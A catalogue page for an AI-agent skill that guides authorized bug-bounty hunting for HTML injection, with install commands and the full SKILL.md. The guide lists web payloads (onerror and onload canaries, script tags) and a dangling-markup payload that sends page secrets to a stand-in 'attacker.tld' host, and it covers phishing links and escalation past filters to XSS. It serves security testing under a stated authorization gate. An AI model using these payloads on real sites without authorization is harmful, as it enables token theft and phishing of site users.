Agent skill

Hunt HTML Injection

by sickn33 in sickn33/agentic-awesome-skills

“Hunt HTML Injection”

— description from SKILL.md by sickn33
MITAuto-check passedSecurity

Install Hunt HTML Injection

skills CLI
$ npx skills add sickn33/agentic-awesome-skills --skill hunt-html-injection -a claude-code

Project install by default; add -g for ~/.claude/skills/.

GitHub CLI
$ gh skill install sickn33/agentic-awesome-skills hunt-html-injection --agent claude-code

Project scope by default; add --scope user for a personal install. Needs GitHub CLI 2.90.0 or later (public preview).

Manual copy
$ git clone --depth 1 https://github.com/sickn33/agentic-awesome-skills.git skills-src && mkdir -p .claude/skills && cp -r skills-src/skills/hunt-html-injection .claude/skills/hunt-html-injection && rm -rf skills-src

Use ~/.claude/skills/ instead of .claude/skills for a personal install. The folder must contain SKILL.md.

Claude Code skills documentation · loads skills from .claude/skills/

Facts

Skill name
hunt-html-injection
GitHub stars
47k
Used in
1 other repo
Token cost
~1.6k tokens
SKILL.md length
746 words
Files
1
Skills in repo
1,493
Repo updated
First seen
Licence
MIT

At a glance

  • SKILL.md covers What is HTML Injection, Attack Surface, Autonomous Testing Priority and Proof, plus 3 more sections
  • Instructions only: no scripts, shell commands, URLs or credentials in SKILL.md

About this skill

Hunt HTML Injection is a skill in sickn33/agentic-awesome-skills (47k stars). Its SKILL.md is about 1.6k tokens, and copies of it appear in 1 other owners' repositories. Licence: MIT.

Requirements

  • Compatibility (from SKILL.md): Requires explicit written authorization for a target scope plus the relevant testing tools for this technique. Docs-only; helper scripts and commands not bundled.

What it can do on your machine

Read from SKILL.md and the folder at commit 680176d. It shows what the files ask for, not the result of running them.

  • Tool permissions

    Pre-approves nothing: there is no allowed-tools line, so your agent's usual permission prompts apply.

    From allowed-tools in the SKILL.md frontmatter.

  • Runs code

    No scripts in the folder and no shell commands in SKILL.md (its code samples are bash).

    From the folder's file list and the shell code blocks in SKILL.md.

  • Network

    Links to these hosts (documentation or services it may open):

    • hackerone.com
    • github.com

    From URLs in SKILL.md, links to its own repository left out.

  • Credentials

    Names no API keys, tokens, secrets or passwords.

    From names ending in _API_KEY, _TOKEN, _SECRET, _KEY or _PASSWORD in SKILL.md.

  • Compatibility

    Requires explicit written authorization for a target scope plus the relevant testing tools for this technique. Docs-only; helper scripts and commands not bundled.

    From compatibility in the SKILL.md frontmatter.

Context cost

Hunt HTML Injection loads about 1.6k tokens when it runs. Until then it costs about 10 tokens; SKILL.md has 746 words of instructions outside code blocks.

Always · name and description, kept in context so the agent knows when to use it
~10
When it runs · the whole SKILL.md, loaded when a task matches
~1.6k

Estimates: characters ÷ 4, the usual rule of thumb; real counts depend on the model's tokenizer. Scripts and assets cost tokens only if the agent reads them.

Safety

Auto-check passed

The automated check found no risky patterns in SKILL.md.

Automated static check — not a guarantee. Review scripts before installing. It scans the text of SKILL.md for risky patterns (piping downloads into a shell, reading credential files, hidden Unicode, destructive commands); files beside SKILL.md are not scanned.

SKILL.md

The full file from sickn33/agentic-awesome-skills at commit 680176d, republished under its MIT licence (© sickn33). 746 words, ~1,621 tokens.

Download SKILL.mdSave it as .claude/skills/hunt-html-injection/SKILL.md (or your agent's skills folder).
name
hunt-html-injection
description
Hunt HTML Injection
compatibility
Requires explicit written authorization for a target scope plus the relevant testing tools for this technique. Docs-only; helper scripts and commands not bundled.
category
security
risk
offensive
source
https://github.com/elementalsouls/Claude-BugHunter
source_repo
elementalsouls/Claude-BugHunter
source_type
community
date_added
2026-09-20
license
MIT
license_source
https://github.com/elementalsouls/Claude-BugHunter/blob/main/LICENSE
sources
hackerone_public, public_research
report_count
6

⚠️ AUTHORIZED USE ONLY This skill is for educational purposes or authorized security assessments only. You must have explicit, written permission from the system owner before using this tool. Misuse of this tool is illegal and strictly prohibited.

Mandatory confirmation gate Before running any command that probes, exploits, changes, persists on, extracts data from, or attempts credential access against a target:

  1. Ask the user to state the exact target URL, IP, account, or resource.
  2. Ask the user to confirm written authorization and the permitted scope.
  3. Show the exact command(s) and explain their expected effect.
  4. Wait for explicit confirmation in the current conversation.

Without that confirmation, remain read-only and provide defensive guidance only. Prefer a sandbox, disposable VM, or controlled lab.

What is HTML Injection

HTML Injection occurs when user input is inserted into a page's HTML without escaping, so injected tags are rendered by the browser as markup rather than displayed as literal text. Unlike XSS, the injected content does not require JavaScript execution — injecting <b>, <h1>, <a>, <img>, or <form> tags is sufficient.

To PROVE impact unambiguously, escalate to an active vector carrying a unique numeric canary — e.g. "><img src=x onerror=alert(91234)> or <svg onload=alert(91234)>. A distinctive 4+ digit number (not alert(1)) distinguishes YOUR reflected injection from the example payloads practice pages embed in their own hint text. Proof = the raw, unescaped vector with your canary appears in the response.

Impact:

  • Phishing via injected <form> or <a href="attacker.com"> tags
  • UI defacement — <h1>HACKED</h1> renders visually on the page
  • Credential harvesting via injected login forms
  • Redirect via <meta http-equiv="refresh">
  • Stepping stone to XSS (may be blocked by WAF on <script> but not <img onerror>)
  • Dangling-markup exfiltration — even with <script> and event handlers filtered, an unterminated tag can capture page content that follows it. Inject <img src='//attacker.tld/log?html= (no closing quote/>); the browser treats everything up to the next ' as the URL, leaking any CSRF token, secret, or PII rendered after your injection point to your server. Works where full XSS is blocked but raw < is reflected.
  • Email/notification-context injection — a field reflected unescaped into a transactional email (signup confirmation, admin alert, support-chat transcript) renders injected <a>/<img>/dangling markup in the recipient's inbox — an audience the web UI can't reach, and often the only place HTML is rendered unfiltered. Inject into name/subject/comment, then read the raw email source. Disclosed class: https://hackerone.com/reports/1935628, https://hackerone.com/reports/3556892.

Attack Surface

Any input that is reflected or stored and then displayed in an HTML context:

  • Search boxes (?q=)
  • Comments, feedback, reviews
  • Profile fields (name, bio, username)
  • Error messages (?error=, ?message=)
  • Subject / body of contact forms
  • Admin-visible fields (ticket titles, usernames in logs)
Show full SKILL.md (314 more words)Show less

Autonomous Testing Priority

Inject a recognisable HTML tag with a unique canary string. Unescaped angle brackets in the response = confirmed injection.

Pattern 1 — Basic HTML tag injection:

<b>CANARY</b>
"><b>CANARY</b>

Use a unique string as CANARY (something distinct to this test run). Proof: the response contains <b>CANARY with literal < angle brackets — not &lt;b&gt;CANARY. A properly encoded app would escape < to &lt;.

Try multiple tag types when <b> is filtered:

  • <h1>CANARY</h1> — heading tag (often less filtered)
  • <img src=x onerror=CANARY> — attribute context
  • <a href="https://attacker.com">click</a> — link injection (phishing proof)

For stored injection: inject into the storage endpoint, then GET the page where the value is displayed and check for unescaped tags.

Escalate immediately: if <b> injection works, try <script>alert(1)</script> — the same unsanitised input may allow full XSS.

Proof

Confirmed when your injected tag appears in the response body with literal < angle brackets (not HTML-encoded). A safe app renders &lt;b&gt;CANARY&lt;/b&gt;; a vulnerable app renders <b>CANARY</b>.

Distinguishing HTML Injection from XSS

  • HTML injection: <b>text</b> renders as text in the browser — no JS execution needed.
  • XSS: <script>alert(1)</script> executes JavaScript.

Some WAFs block <script> but pass <b> or <img> — start with non-script tags, then escalate.

When to Use

  • You have explicit, written authorization to assess the target in scope, and the task matches this skill's vulnerability class or technique within a bug-bounty or penetration-test engagement.
  • You need the recon, exploitation, or validation workflow described below — executed strictly inside the approved scope.

Limitations

  • Authorized scope only: the confirmation gate above is mandatory before any probing, exploitation, or credential-access command.
  • Docs-only import: upstream helper scripts, commands, engine, and research assets are not bundled; reinstall tooling from the source repo when needed.
  • Validate every finding (see triage-validation) before reporting; report via report-writing. Prefer a sandbox, disposable VM, or controlled lab.
Example
bash
# Read-only first step; confirm scope before anything active.
cat scope.txt  # target list from the authorized engagement brief

Adapted from elementalsouls/Claude-BugHunter (MIT); frontmatter, When to Use/Limitations, and safety boundaries added for upstream compliance. Docs-only import: executable helpers, commands, engine, and research assets not bundled.

© sickn33, MIT. Rendered from Markdown: HTML in the file is shown as text, images as links, and headings moved down two levels. Raw file

Files

Just SKILL.md in skills/hunt-html-injection of sickn33/agentic-awesome-skills.

Open the folder on GitHubat commit 680176d

Used in 1 other repository

We found 5 copies of this SKILL.md (exact, near-identical or edited) in other folders, from 1 other GitHub owner. This page covers the copy in sickn33/agentic-awesome-skills, which our catalogue first saw on October 7, 2026.

Compare with similar skills

Hunt HTML Injection next to the 5 skills that share the most tags, products or categories with it. Stars are the repository's; “used in” counts other GitHub owners with a copy.

Hunt HTML Injection compared with similar skills
SkillStarsUsed inTokensAuto-checkLicenceRepo updated
Hunt HTML Injection this skillsickn33/agentic-awesome-skills47k1 repos~1.6kAutomated safety check: PassMIT
Fla Ascend Performancefla-org/flash-linear-attention5.8k—~6.3kAutomated safety check: PassMIT
Deepsec Documentation Guidevercel-labs/deepsec8.1k—~956Automated safety check: PassApache-2.0
Skill Scannergetsentry/skills1k4 repos~2.5kAutomated safety check: WarnApache-2.0
Serenity Aleabitoreddityan-labs/serenity-aleabitoreddit4811 repos~3.3kAutomated safety check: PassNone
Security Alert Triageelastic/agent-skills5921 repos~3.5kAutomated safety check: NotesApache-2.0

Similar skills

  • Fla Ascend Performance

    fla-org/flash-linear-attention

    Guidelines for Ascend NPU kernel / Triton-Ascend backend performance work in the FLA repo.

    5.8k GitHub stars~6.3k tokensUpdated today
    SecurityAuto-check passed
  • Deepsec Documentation Guide

    vercel-labs/deepsec

    Official

    Points the agent at deepsec's own docs to answer questions about initializing, configuring, resuming, scanning with and extending the vulnerability scanner.

    8.1k GitHub stars~956 tokensUpdated 9 days ago
    SecurityAuto-check passed
  • Skill Scanner

    getsentry/skills

    Official

    Scan agent skills for security issues. An agent skill from getsentry/skills.

    1k GitHub starsUsed in 4 repos~2.5k tokens
    SecurityAuto-check: warnings
  • Serenity Aleabitoreddit

    yan-labs/serenity-aleabitoreddit

    Apply trader Serenity's (@aleabitoreddit) AI/semiconductor supply-chain analytical lens to US-stock ideas and market judgment.

    481 GitHub starsUsed in 1 repo~3.3k tokens
    SecurityAuto-check passed
  • Security Alert Triage

    elastic/agent-skills

    Official

    Triage Elastic Security alerts — gather context, classify threats, create cases, and acknowledge.

    592 GitHub starsUsed in 1 repo~3.5k tokens
    SecurityAuto-check: notes
  • Shiro Attack CLI

    SummerSec/ShiroAttack2

    当用户要求利用、检测或测试 Apache Shiro rememberMe 反序列化漏洞 (Shiro-550, CVE-2016-4437) 时使用。触发词包括 "Shiro"、"rememberMe"、"shiro attack"、"CVE-2016-4437"、"Shiro-550"、"爆破 Shiro key"、"利用 Shiro"、"Shiro…

    2.6k GitHub stars~945 tokensUpdated 4 mo ago
    SecurityAuto-check passed

More from sickn33/agentic-awesome-skills

All 1,493 skills in this repo
  • Liuguang Banlan UI

    sickn33/agentic-awesome-skills

    Implements an interface in one of two named color modes, iridescent white or colorful black, from a parameterized starter that reports measured color intensity.

    47k GitHub starsUsed in 1 repo~2.5k tokens
    Auto-check passed
  • User Thoughts Memory

    sickn33/agentic-awesome-skills

    Saves a user's project decisions, rules and preferences into a project-local mdbase so later sessions and other agents can recover the intent.

    47k GitHub starsUsed in 1 repo~2.5k tokens
    Auto-check passed
  • Using LWC Memory and Graphs

    sickn33/agentic-awesome-skills

    Keeps project decisions, research and verified results available across coding-agent sessions through LWC memory, a document Wiki graph and a CodeGraph code index.

    47k GitHub starsUsed in 1 repo~2k tokens
    Auto-check passed
  • Find Complementary Founders

    sickn33/agentic-awesome-skills

    Guides an agent through assessing its own owner for cofounder fit, publishing an approved profile, and ranking complementary profiles other agents published for their owners.

    47k GitHub starsUsed in 1 repo~4.8k tokens
    Auto-check passed
  • Whatsapp Cloud API

    sickn33/agentic-awesome-skills

    Integracao com WhatsApp Business Cloud API (Meta). An agent skill from sickn33/agentic-awesome-skills.

    47k GitHub starsUsed in 2 repos~4.5k tokens
    Auto-check passed
  • Cline Pilot

    sickn33/agentic-awesome-skills

    Acts as a proxy for the Cline CLI, dispatching coding tasks one at a time, monitoring runs by hard evidence, relaying decisions to you and learning per-project preferences.

    47k GitHub starsUsed in 1 repo~4.6k tokens
    Auto-check passed

Categories

Questions about Hunt HTML Injection

How do I install Hunt HTML Injection in Claude Code?

Run `npx skills add sickn33/agentic-awesome-skills --skill hunt-html-injection -a claude-code`. Or copy the skill folder (skills/hunt-html-injection in sickn33/agentic-awesome-skills) into .claude/skills/hunt-html-injection in your project. Claude Code loads it when a task matches its description.

How do I install Hunt HTML Injection in Codex?

Run `npx skills add sickn33/agentic-awesome-skills --skill hunt-html-injection -a codex`. Or copy the skill folder (skills/hunt-html-injection in sickn33/agentic-awesome-skills) into .agents/skills/hunt-html-injection in your project. Codex loads it when a task matches its description.

Can I use Hunt HTML Injection in Cursor, Gemini CLI or GitHub Copilot?

Cursor, Gemini CLI, GitHub Copilot and OpenCode also load SKILL.md folders. With the skills CLI, run `npx skills add sickn33/agentic-awesome-skills --skill hunt-html-injection -a cursor` (or -a gemini-cli, github-copilot or opencode for the others). To copy it by hand, put the folder in .cursor/skills/hunt-html-injection, .gemini/skills/hunt-html-injection, .github/skills/hunt-html-injection and .opencode/skills/hunt-html-injection in your project.

What does Hunt HTML Injection need to run?

SKILL.md names no scripts, command-line tools or credentials: Hunt HTML Injection is instructions for the agent only. Compatibility (from SKILL.md): Requires explicit written authorization for a target scope plus the relevant testing tools for this technique. Docs-only; helper scripts and commands not bundled..

Does Hunt HTML Injection access the network?

SKILL.md names 2 domains. As links in the text: hackerone.com and github.com. This is read from the text; nothing was executed.

Is Hunt HTML Injection safe to install?

Our automated static check of SKILL.md found no risky patterns, such as piping downloads into a shell, reading credential files or hidden Unicode. It is not a guarantee. Review the folder before installing.

What licence does Hunt HTML Injection use?

Hunt HTML Injection is published under the MIT licence (declared in SKILL.md). It allows redistribution, so the full SKILL.md is shown on this page.

How many tokens does Hunt HTML Injection use?

About 1.6k tokens (SKILL.md is roughly 6.5k characters). Agents keep only the skill's name and description in context until a task matches; then they load SKILL.md in full.

What are the alternatives to Hunt HTML Injection?

Skills that share tags, products or a category with Hunt HTML Injection: Fla Ascend Performance (fla-org/flash-linear-attention, 5.8k stars), Deepsec Documentation Guide (vercel-labs/deepsec, 8.1k stars), Skill Scanner (getsentry/skills, 1k stars) and Serenity Aleabitoreddit (yan-labs/serenity-aleabitoreddit, 481 stars). The comparison table on this page puts their stars, adoption, token cost, safety result and licence side by side.

Who maintains Hunt HTML Injection?

sickn33 (a GitHub user) maintains it in sickn33/agentic-awesome-skills, which has 47,379 GitHub stars. The repository holds 1,493 skills in this directory. The repository was last updated on October 9, 2026.

Source: sickn33/agentic-awesome-skills on GitHub. Facts on this page come from the repository at the commit we read; the author's words are quoted as theirs.